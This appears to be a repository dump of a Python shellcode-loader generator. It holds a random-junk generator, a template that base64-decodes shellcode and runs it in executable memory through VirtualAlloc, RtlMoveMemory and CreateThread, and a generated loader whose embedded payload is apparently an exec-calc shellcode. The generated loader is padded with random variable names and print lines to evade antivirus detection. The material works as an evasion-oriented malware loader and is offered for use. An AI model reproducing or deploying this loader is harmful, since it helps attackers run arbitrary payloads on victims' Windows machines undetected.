77 | 'l',
78 | 'm',
79 | 'n',
80 | 'o',
81 | 'p',
82 | 'q',
83 | 'r',
84 | 's',
85 | 't',
86 | 'u',
87 | 'v',
88 | 'w',
89 | 'x',
90 | 'y',
91 | 'z']
92 | if has_num:
93 | return strs[self.auto_random_int(min_int=0, max_int=35)]
94 | else:
95 | return strs_no_num[self.auto_random_int(min_int=0, max_int=25)]
96 |
97 | def auto_random_word(self, min_length=3, max_length=10, first_str_no_num=False, all_str_no_num=False):
98 | """
99 | 随机生成一个单词
100 | :param min_length: 单词最小长度
101 | :param max_length: 单词最大长度
102 | :param first_str_no_num: 第一个字符可以为数字字符
103 | :param all_str_no_num: 所有字符都不能含有数字字符
104 | :return: 单词
105 | """
106 | word = ''
107 |
108 | if all_str_no_num:
109 | # 不含数字字符
110 | for i in range(
111 | self.auto_random_int(
112 | min_int=min_length,
113 | max_int=max_length)):
114 | word = word + self.auto_random_str(has_num=False)
115 | else:
116 | if first_str_no_num:
117 | # 第一个字符不能为数字
118 | # 先生成一个不含数字的字符做为第一个字符
119 | word = word + self.auto_random_str(has_num=False)
120 | if min_length > 1:
121 | for i in range(
122 | self.auto_random_int(
123 | min_int=min_length - 1,
124 | max_int=max_length - 1)):
125 | word = word + self.auto_random_str()
126 | else:
127 | pass
128 | else:
129 | # 第一个字符可以为数字
130 | for i in range(
131 | self.auto_random_int(
132 | min_int=min_length,
133 | max_int=max_length)):
134 | word = word + self.auto_random_str()
135 | return word
136 |
137 | def auto_random_sleep(self, max_int, min_int=0):
138 | """
139 | 睡眠随机数的秒数的时间
140 | :param max_int:最小睡眠时间
141 | :param min_int:最大睡眠时间
142 | :return:
143 | """
144 | time.sleep(self.auto_random_int(max_int))
145 |
146 | def auto_random_void_command(self, max_str=1000, min_str=500, max_int=3, min_int=1):
147 | """
148 | 返回空白指令字符串
149 | :param max_str: 随机单词最大长度
150 | :param min_str: 随机单词最小长度
151 | :param max_int: 随机睡眠最大时间
152 | :param min_int: 随机睡眠最小时间
153 | :return:
154 | """
155 | random_word = self.auto_random_word(
156 | min_length=min_str, max_length=max_str, first_str_no_num=True)
157 | random_int = self.auto_random_int(max_int=max_int, min_int=min_int)
158 | void_command = [
159 | 'print("tag")'.replace('tag', random_word),
160 | 'time.sleep(tag)'.replace('tag', str(random_int)),
161 | 'tag1 = tag2 + tag3'.replace('tag1', random_word)
162 | .replace('tag2', str(self.auto_random_int(99999999)))
163 | .replace('tag3', str(self.auto_random_int(99999999))),
164 | 'tag1 = tag2 - tag3'.replace('tag1', random_word)
165 | .replace('tag2', str(self.auto_random_int(99999999)))
166 | .replace('tag3', str(self.auto_random_int(99999999))),
167 | 'tag1 = tag2 * tag3'.replace('tag1', random_word)
168 | .replace('tag2', str(self.auto_random_int(99999999)))
169 | .replace('tag3', str(self.auto_random_int(99999999))),
170 | 'tag1 = tag2 / tag3'.replace('tag1', random_word)
171 | .replace('tag2', str(self.auto_random_int(99999999)))
172 | .replace('tag3', str(self.auto_random_int(99999999))),
173 | 'tag1 = "tag2" + "tag3"'.replace('tag1', random_word)
174 | .replace('tag2', self.auto_random_word(
175 | min_length=min_str, max_length=max_str, first_str_no_num=True))
176 | .replace('tag3', self.auto_random_word(
177 | min_length=min_str, max_length=max_str, first_str_no_num=True)),
178 | ]
179 | return void_command[self.auto_random_int(min_int=0, max_int=len(void_command) - 1)]
180 |
--------------------------------------------------------------------------------
/modle/autor.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- encoding: utf-8 -*-
3 | # @Time : 2021/3/5 16:01
4 | # @Author : ordar
5 | # @File : autor.py
6 | # @Project : autoer
7 | # @Python : 3.7.5
8 | from modle.auto_random import AUTO_RANDOM
9 |
10 |
11 | class AUTOR:
12 | """
13 | 统一管理所有插件,只需实例化这一个对象即可使用所有插件的所有方法
14 | """
15 | def __init__(self):
16 | self.random = AUTO_RANDOM()
17 |
18 |
--------------------------------------------------------------------------------
/shellcode.py:
--------------------------------------------------------------------------------
1 |
2 | import ctypes,base64,time
3 |
4 | bzhve4ir3k5hi51ct5ceg9zbbyg5qnrekftqimv5f6woe7dejcy69cy6lwkw0efvrnflq66yyfk46cf0025iw3xqy8qd2i4ds6lojub9q56xj5bw3i3t6jblekocy3dnqqmtcbx0p1y3ye1d631z5eshyyjpx7cpjmhvc3fsfm6k8p3qtnrpz90hq291uf04vzlwzrncbiggp09dh73x4fricyl4np3jb9gjckn9qqbw0fkf9o1hawvdjiafqxbc43c8jw5vz3eoz3ime8ovsy4ex9tgiv8y882w89t4efkvnq384itb23chq11mt0lonzczr1qne4rahd0w5g6x7zaq8bddlvi24sk6llpnjbmyn76awcmmx4irv8e14ou1yc60mlq0x76x62np5qyhu0gv5y2ouz9ym20tkp262ci1y9gdcijcuyovl6ldddw49w2b4wacses7oprhero0f8uhbjktcthlsaw11ay9ux9zn1wttc9v0rys4o5b80bq98tahd4gd9uoni14437g16kd9320kob5rbtmo4go06fxyconwbejhc6hw4yx4hzky5vejevyjpz3put2fzb4q1bokc6oa8vl22so9c989wkd64lw2p2cv6diz5izamomqdwbtzc85fi9u0y3vvujbmvb5ohzqlcm1szqpfaff = 7074841 - 24047293
5 |
6 | gnkm5nlru5 = base64.b64decode('/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=')
7 |
8 | time.sleep(1)
9 |
10 | gnkm5nlru5 = bytearray(gnkm5nlru5)
11 |
12 | time.sleep(2)
13 |
14 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
15 |
16 | g7z6o7s5i93jkst0eacs18fp2ts1mfusghtb44mrheha7nj8kror3kvgmfhfhqiayh3tf94dklz70fo8s8ow80o2zfiw3cgra8wyua5ddxvtmytndwemkzgghbno3lkta0j0rzlbxgntzp96td2cjai49fzk6svv2jtrhuu67av7jgs4iq8zpforz235q2hdeyamdu9kh99f0uh2xzm6xvhxikewis4g9vvj1a23fkvcjprziiaxf1l1c6i079nrzob7l3kk99keil8bwzq11oslohu03gijmo8kyh5h1wk8ltfjsnwrh97kzo8d9em110q68iu9wed9sz8sk4nhm45ujp0chlkdmv2kc8rru5rncg56bfjhqo4ocidk9ww1fg7uwnbmtknhk3yn58701a7jvxy93ezifpidy5izg74eoi9fwjpxkbw6dwl62wotgtd6rszdff5kw4suyel6kbs64qpzhtl99z5kk6ug4wb5kq93ixgq85bkpr9ebrivhoevyx4uve92iay3e1rhrbfqft0 = "tz5jbl9zje20dhlb1bh1afx57xuvm32jhftcqery4v8xbhpl8fvoqaldueb7jgmuypl8hniw804ct5ifhoy9ezl9v5wfwc3y75uqq543trpcqwmf5prjq7ibl23t2rsxvb3z3k17alr5wslec3t22rsocsjfccyzvw6ct86mgvjl8wwridkhjni7wiziuyxollh30z6ybxc0sunf35v4mov3z17vto5fbn4vqjtdx3d1wy1yw58g4psdey50qj9xd3ag8xplltvkzvskm39f656sl39lavdejtwlppqmppt73ywmk9amhaeuojc132uplqqotu5d6q6ngbez6drpvf59652x0za633lmw5kjehaqoem9aimz6nr1t74m7gimk75htze2p54lmxft939u7ay5lhpswezr3ritxb4zfoceikdayaltvje7hgjqevjdvengu8wj8f7l9gj0sxjxhvde9eribkj86iyhju6a5gi0n653ym6ysq6nuurvxl48rbwso4" + "hezo6ue4buod8mg7xip5p9ask078v11ck39rz6o47q2wo6bxrhnj8n934u0ai0l2amuy5sirtjnv0vvt9ta6ejh1xjumdbkk5mekizw4krbluyrorddabtlecgkry8f0aovlgfebrl3uittlykdp1r7voweoo1i9br1wwrxsgltpzpcruscuziewf6z0pjhk4smzfk7062puyl5tpqgn8h8nu0uux0glf5jh4ssk8ksudrwmt8gj98wazo19dqfkzj9420oof1yviymffpf5ajtyisflyd9o7itp5bm3vk3o8sg6ruvd9ngtkg00x9s4nayaxlctqmedk908re2ofcs63vrs5z4smsa6hsk9m8fh4h81a87zk0bmk9qocq2aa4shryou6q5rg48w6xditr25kg8oo0vv3hht2sfpa8g370tmgh4a8vzqc5pad6226172a7q8c6ga736yr28pb3us1e9jhn4djuauu6zx6wuvyi6krdj0e16oz84ktx6e0e71n6z3wfp51nmz4sqxylcl0wu7vn6jq3mueb9ln8yvpgaghekorqrjwdu585ny2pz0s158eeajhkqo5gzcsvsseyd4uma4jvmhndu8uou4fmuhx3w6tymo5rxrjnn3"
17 |
18 | a5433x = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(gnkm5nlru5)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
19 |
20 | print("p25xi0d12izsuk6x8kxhhv1kknfj63a049cpjygrvveoz91es3m6jhq3gnqmst23fqg6bz0s5qocvn3zn5smtn0atmgqn6q4r5w8ujuyjqz1ef2ggabzee0b6f6rtfls8csi9tefqt9hzm6q1bqfy3w3u515hq9s3voa0jd3nmrzn53cmf8iv649io87w4itj51vo8ji6pjr6iwuiv36tqiorw8eqsx2awtw22ii7vou52oatruzuhme6essqucd8bvgdry1tou3xc0vd1xjqbbjblxoqbhajnl76wxjyclsv4o5c6os6lrb31amxf5f0ls21qqkh9al3ooanxqnpz5motigcywgcnhelm31dsaevt8v8726pyf483bxx1mlzyz3slitn1o47s71loz3l70oxmskos0irisazphkvkub7fmbba15ktwgve9qiepeezuhmadowh6wj5og71b0slctfyk71reg5ckqr9fq8y6f94o34v2ers4mtggpf7d8j69e47ttbnrdlwy3hm8bvo5l8cgbk3c82p01b92tzl8s36i36h0lsf111raph4dqru2juyiqbj0mo6uuwsorpqrnfakqpzbs99qoaiyrfpqsaqp2w8secfj90dft4d9tl9ifsol9nvx724sx3jvzncg8cxe6c574ums3daetr8rvzsry6hi3ysqm6nl")
21 |
22 | cw4kx3tg = (ctypes.c_char * len(gnkm5nlru5)).from_buffer(gnkm5nlru5)
23 |
24 | print("p25xi0d12izsuk6x8kxhhv1kknfj63a049cpjygrvveoz91es3m6jhq3gnqmst23fqg6bz0s5qocvn3zn5smtn0atmgqn6q4r5w8ujuyjqz1ef2ggabzee0b6f6rtfls8csi9tefqt9hzm6q1bqfy3w3u515hq9s3voa0jd3nmrzn53cmf8iv649io87w4itj51vo8ji6pjr6iwuiv36tqiorw8eqsx2awtw22ii7vou52oatruzuhme6essqucd8bvgdry1tou3xc0vd1xjqbbjblxoqbhajnl76wxjyclsv4o5c6os6lrb31amxf5f0ls21qqkh9al3ooanxqnpz5motigcywgcnhelm31dsaevt8v8726pyf483bxx1mlzyz3slitn1o47s71loz3l70oxmskos0irisazphkvkub7fmbba15ktwgve9qiepeezuhmadowh6wj5og71b0slctfyk71reg5ckqr9fq8y6f94o34v2ers4mtggpf7d8j69e47ttbnrdlwy3hm8bvo5l8cgbk3c82p01b92tzl8s36i36h0lsf111raph4dqru2juyiqbj0mo6uuwsorpqrnfakqpzbs99qoaiyrfpqsaqp2w8secfj90dft4d9tl9ifsol9nvx724sx3jvzncg8cxe6c574ums3daetr8rvzsry6hi3ysqm6nl")
25 |
26 | ctypes.windll.kernel32.RtlMoveMemory(
27 | ctypes.c_uint64(a5433x),
28 | cw4kx3tg,
29 | ctypes.c_int(len(gnkm5nlru5))
30 | )
31 |
32 | print("ixfxd1r99zugybi3az4k7fl7mf1pqj04hjcma5zncv9jiidv4cv9icfi6wtjcmw329ka01vibeh7dnm378n7s2ihj1owsb68y2qqa8s48scq9zxog9ww0k0syyr8z2ss9n2k1au8vrbkh6ljwo9mn82osz1ap95o85x4zddfswfde1sdz50fcen5d0x1ar9aj762f1qyf1p937eg0e5qm1p4dzj7ysqpnrfrruwx6wnneoh1xxqjkv4vnr13gwe8clinifsg7acqwi9pjtrirasz4cwr5yi672bnypvvcn9fl60jursr2rptfci7han6s80cmu9ivuy60wj5duwk8gjxtr06r2vvfyvgic2h9nubl5ke4ek8ic7u1kvcrgi6k75p6lqag5cxcn426wqsd7g2xym77nnvwuk2x7m6fom1a177kq10d3syq7pw871nsxvfrg755wf6bqu4fn7eduhej86z91zexawwqu47q0gfk85681fa3vra21pq2dcum676m8fl3ziv52ewbdd4p04p6csggg8n31ecyrbmddaon08f4ci2zf1sti8v6goucz0b9hcxgemxa9q4n2qpedky064s4x90mwdx3xo5tzntekhwpcfj9i53rpozxvx6ddewdrj9gp4dgnahcwutk4r1hfm946xvrkzwr8136jdg2jj16t1l2yrlylvwmn8fwh1h97hi3m7m61vcyzpoifcuz24wyedr7hb2defvl0veezlxojjapp09rcz9o2iw4enz1hs2wc0om30x70zcl04kzq19t71ekhgi51jz7tc3garvf2nmy5k3he9q4ckso558gwjxty3k3q795u0e0cdz4nw55k5zkf3x6uuabvlgclbyasr0henuz3kl0dg397zmv1focntl4kc79t0ymmbp078o5srvm1")
33 |
34 | handle = ctypes.windll.kernel32.CreateThread(
35 | ctypes.c_int(0),
36 | ctypes.c_int(0),
37 | ctypes.c_uint64(a5433x),
38 | ctypes.c_int(0),
39 | ctypes.c_int(0),
40 | ctypes.pointer(ctypes.c_int(0))
41 | )
42 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
43 |
--------------------------------------------------------------------------------
/source.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- encoding: utf-8 -*-
3 | # @Time : 2021/3/23 14:55
4 | # @Author : ordar
5 | # @File : source.py
6 | # @Project : HanGuang
7 | # @Python : 3.7.5
8 | import ctypes,base64,time
9 |
10 |
11 | shellcode = base64.b64decode('flag_to_replace')
12 |
13 | shellcode = bytearray(shellcode)
14 | # 设置VirtualAlloc返回类型为ctypes.c_uint64
15 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
16 | # 申请内存
17 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
18 |
19 | # 放入shellcode
20 | buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
21 | ctypes.windll.kernel32.RtlMoveMemory(
22 | ctypes.c_uint64(ptr),
23 | buffered,
24 | ctypes.c_int(len(shellcode))
25 | )
26 | # 创建一个线程从shellcode防止位置首地址开始执行
27 | handle = ctypes.windll.kernel32.CreateThread(
28 | ctypes.c_int(0),
29 | ctypes.c_int(0),
30 | ctypes.c_uint64(ptr),
31 | ctypes.c_int(0),
32 | ctypes.c_int(0),
33 | ctypes.pointer(ctypes.c_int(0))
34 | )
35 | # 等待上面创建的线程运行完
36 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
--------------------------------------------------------------------------------